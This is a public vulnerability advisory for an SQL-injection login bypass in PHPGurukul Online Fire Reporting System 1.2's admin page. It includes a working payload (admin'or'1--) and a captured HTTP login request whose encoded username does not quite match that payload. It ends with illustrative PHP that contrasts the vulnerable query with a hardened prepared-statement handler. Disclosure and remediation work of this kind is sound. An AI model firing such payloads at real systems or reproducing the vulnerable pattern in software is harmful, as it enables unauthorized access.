A SQL Injection vulnerability exists in the ofrs/admin/index.php
script of PHPGurukul Online Fire Reporting System 1.2. The
vulnerability allows attackers to bypass authentication and gain
unauthorized access by injecting SQL commands into the username input
field during the login process.
- Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/
- Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip
- Version: V1.2
- Tested on: Windows 11 + XAMPP 8.0.30
SQL Injection Vulnerability in ofrs/admin/index.php: The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process; the username submitted to the login form reaches the SQL query without sanitization or parameterization, so a crafted value alters the query and bypasses the credential check.
- Open the admin panel page at the following URL: http://localhost/ofrs/admin/index.php
- Enter the following payload in the username box:
admin'or'1--
- Press the Login button or press Enter. The login request sent by the browser is shown below:
POST /ofrs/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 46
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/ofrs/admin/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29
Connection: close
username=admin%27or%27--&inputpwd=&login=login
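The following PHP is an added illustration and is not code from PHPGurukul or from this advisory. It shows the pattern behind this class of bug, a login query assembled by string concatenation, next to a hardened handler that uses a prepared statement and password_verify(). The table and column names (tbladmin, UserName, Password, PasswordHash), the md5() in the vulnerable version, and the database credentials in the usage comment are all assumptions made for the example; only the form field names username and inputpwd come from the captured request above.

```php
<?php
// Added example, not the vendor's code. Table/column names, the use of md5()
// in the vulnerable handler and the connection details are assumed.

// Vulnerable pattern: the username is spliced into the SQL text, so a quote
// in $username closes the string early and "--" comments out the rest of the
// WHERE clause, which is what turns a login form into an authentication bypass.
function vulnerableLogin(mysqli $db, string $username, string $password): bool
{
    $sql = "SELECT ID FROM tbladmin WHERE UserName='" . $username
         . "' AND Password='" . md5($password) . "'";   // md5 assumed for illustration
    $result = $db->query($sql);
    return $result !== false && $result->num_rows > 0;
}

// Hardened pattern: a prepared statement fixes the query structure before the
// value is bound, so quotes and comment sequences in $username are just data.
// The password is checked with password_verify() against a password_hash()
// value rather than compared inside the query.
function safeLogin(mysqli $db, string $username, string $password): bool
{
    $stmt = $db->prepare("SELECT PasswordHash FROM tbladmin WHERE UserName = ? LIMIT 1");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        // Verify against a throwaway hash so an unknown user costs about as
        // much time as a wrong password (limits user enumeration by timing).
        password_verify($password, password_hash('placeholder', PASSWORD_DEFAULT));
        return false;
    }
    return password_verify($password, (string) $storedHash);
}

// Usage (assumes a reachable MySQL instance; credentials are placeholders):
// $db = new mysqli('localhost', 'dbuser', 'dbpass', 'ofrs');
// session_start();
// if (safeLogin($db, $_POST['username'] ?? '', $_POST['inputpwd'] ?? '')) {
//     session_regenerate_id(true);
//     $_SESSION['admin'] = $_POST['username'];
// }
```

With the hardened handler, the payload from the advisory is bound as a literal string and the lookup simply finds no matching UserName, so the request is rejected. Migrating existing records from an unsalted hash to password_hash() values is a separate step that has to happen before safeLogin() can be switched on.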